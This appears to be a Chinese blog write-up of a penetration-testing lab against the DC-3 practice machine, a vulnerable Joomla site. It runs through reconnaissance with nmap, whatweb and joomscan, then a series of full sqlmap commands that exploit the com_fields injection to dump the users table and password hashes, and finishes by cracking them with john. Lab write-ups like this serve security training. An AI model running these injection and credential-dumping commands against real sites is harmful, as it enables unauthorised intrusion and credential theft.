靶机入侵 DC-3

靶机入侵  DC3

渗透环境

kali Linux

DC-3  桥接同一网段

1.根据靶机mac地址寻找ip

KALI 自带的ARP侦查工具扫描

netdiscove   

靶机入侵 DC-3_第1张图片

2.nmap查看开放放口

nmap -O 10.3.139.67 -p-

靶机入侵 DC-3_第2张图片

3.使用whatweb对网站进行指纹识别 

whatweb http://10.3.139.67

查询到网站的CMS

靶机入侵 DC-3_第3张图片

4.joomscan 进行漏扫

joomscan --url http://10.3.139.67

靶机入侵 DC-3_第4张图片

靶机入侵 DC-3_第5张图片

4.使用searchsploit 进行本地漏洞在线查询

靶机入侵 DC-3_第6张图片

靶机入侵 DC-3_第7张图片

5.更改地址利用sqlmap进行查询注入点

--dbs列出数据库有哪些库名

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

靶机入侵 DC-3_第8张图片

靶机入侵 DC-3_第9张图片

6.确定web应用连接的是哪个数据库

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

靶机入侵 DC-3_第10张图片

7.指定数据库查询数据库中的表

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

靶机入侵 DC-3_第11张图片

8.查询#__users表中的字段

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

靶机入侵 DC-3_第12张图片

靶机入侵 DC-3_第13张图片

9.查询admin,password字段内容

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

靶机入侵 DC-3_第14张图片

靶机入侵 DC-3_第15张图片

靶机入侵 DC-3_第16张图片

10.john解密密文

使用kali的john是遇到的坑

当它解密之后无法再次解密该文件

解决:删除   .john/john.pot      文件下解密过的字符串

john /etc/joomla_v370.txt 

靶机入侵 DC-3_第17张图片

11.登录后台

靶机入侵 DC-3_第18张图片

靶机入侵 DC-3_第19张图片

 

你可能感兴趣的:(渗透测试)